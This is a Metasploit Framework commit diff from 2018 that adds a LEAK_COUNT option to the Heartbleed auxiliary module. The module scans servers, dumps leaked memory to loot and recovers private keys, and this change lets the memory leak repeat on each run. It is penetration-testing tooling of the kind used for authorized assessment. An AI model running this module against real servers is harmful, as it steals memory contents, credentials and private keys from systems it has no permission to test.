Land #10680, LEAK_COUNT option for Heartbleed

4.x
William Vu 2018-09-20 20:15:48 -05:00 committed by Metasploit
parent 858b67f943
commit 7ef006fcf9
No known key found for this signature in database
GPG Key ID: CDFB5FA52007B954
1 changed files with 27 additions and 13 deletions

View File

@ -109,8 +109,12 @@ class MetasploitModule < Msf::Auxiliary
STARTTLS may also be vulnerable. STARTTLS may also be vulnerable.
The module supports several actions, allowing for scanning, dumping of The module supports several actions, allowing for scanning, dumping of
memory contents, and private key recovery. The `repeat` command can be memory contents to loot, and private key recovery.
used to make running the `DUMP` many times more convenient. As in:
The LEAK_COUNT option can be used to specify leaks per SCAN or DUMP.
The repeat command can be used to make running the SCAN or DUMP many
times more powerful. As in:
repeat -t 60 run; sleep 2 repeat -t 60 run; sleep 2
To run every two seconds for one minute. To run every two seconds for one minute.
}, },
@ -145,7 +149,7 @@ class MetasploitModule < Msf::Auxiliary
'Actions' => 'Actions' =>
[ [
['SCAN', {'Description' => 'Check hosts for vulnerability'}], ['SCAN', {'Description' => 'Check hosts for vulnerability'}],
['DUMP', {'Description' => 'Dump memory contents'}], ['DUMP', {'Description' => 'Dump memory contents to loot'}],
['KEYS', {'Description' => 'Recover private keys from memory'}] ['KEYS', {'Description' => 'Recover private keys from memory'}]
], ],
'DefaultAction' => 'SCAN', 'DefaultAction' => 'SCAN',
@ -161,9 +165,10 @@ class MetasploitModule < Msf::Auxiliary
OptEnum.new('TLS_CALLBACK', [true, 'Protocol to use, "None" to use raw TLS sockets', 'None', [ 'None', 'SMTP', 'IMAP', 'JABBER', 'POP3', 'FTP', 'POSTGRES' ]]), OptEnum.new('TLS_CALLBACK', [true, 'Protocol to use, "None" to use raw TLS sockets', 'None', [ 'None', 'SMTP', 'IMAP', 'JABBER', 'POP3', 'FTP', 'POSTGRES' ]]),
OptEnum.new('TLS_VERSION', [true, 'TLS/SSL version to use', '1.0', ['SSLv3','1.0', '1.1', '1.2']]), OptEnum.new('TLS_VERSION', [true, 'TLS/SSL version to use', '1.0', ['SSLv3','1.0', '1.1', '1.2']]),
OptInt.new('MAX_KEYTRIES', [true, 'Max tries to dump key', 50]), OptInt.new('MAX_KEYTRIES', [true, 'Max tries to dump key', 50]),
OptInt.new('STATUS_EVERY', [true, 'How many retries until status', 5]), OptInt.new('STATUS_EVERY', [true, 'How many retries until key dump status', 5]),
OptRegexp.new('DUMPFILTER', [false, 'Pattern to filter leaked memory before storing', nil]), OptRegexp.new('DUMPFILTER', [false, 'Pattern to filter leaked memory before storing', nil]),
OptInt.new('RESPONSE_TIMEOUT', [true, 'Number of seconds to wait for a server response', 10]) OptInt.new('RESPONSE_TIMEOUT', [true, 'Number of seconds to wait for a server response', 10]),
OptInt.new('LEAK_COUNT', [true, 'Number of times to leak memory per SCAN or DUMP invocation', 1])
]) ])
register_advanced_options( register_advanced_options(
@ -207,10 +212,17 @@ class MetasploitModule < Msf::Auxiliary
# Main method # Main method
def run_host(ip) def run_host(ip)
case action.name case action.name
when 'SCAN' # SCAN and DUMP are similar, but DUMP stores loot
loot_and_report(bleed) when 'SCAN', 'DUMP'
when 'DUMP' # 'Tis but a scratch
loot_and_report(bleed) # Scan & Dump are similar, scan() records results bleeded = ''
1.upto(leak_count) do |count|
vprint_status("Leaking heartbeat response ##{count}")
bleeded << (bleed || '')
end
loot_and_report(bleeded)
when 'KEYS' when 'KEYS'
get_keys get_keys
else else
@ -266,6 +278,10 @@ class MetasploitModule < Msf::Auxiliary
datastore['TLS_CALLBACK'] datastore['TLS_CALLBACK']
end end
def leak_count
datastore['LEAK_COUNT']
end
# #
# TLS Callbacks # TLS Callbacks
# #
@ -493,13 +509,12 @@ class MetasploitModule < Msf::Auxiliary
# Stores received data # Stores received data
def loot_and_report(heartbeat_data) def loot_and_report(heartbeat_data)
if heartbeat_data.nil? || heartbeat_data.empty?
unless heartbeat_data
vprint_error("Looks like there isn't leaked information...") vprint_error("Looks like there isn't leaked information...")
return return
end end
print_good("Heartbeat response with leak") print_good("Heartbeat response with leak, #{heartbeat_data.length} bytes")
report_vuln({ report_vuln({
:host => rhost, :host => rhost,
:port => rport, :port => rport,
@ -541,7 +556,6 @@ class MetasploitModule < Msf::Auxiliary
# Show abbreviated data # Show abbreviated data
vprint_status("Printable info leaked:\n#{abbreviated_data}") vprint_status("Printable info leaked:\n#{abbreviated_data}")
end end
# #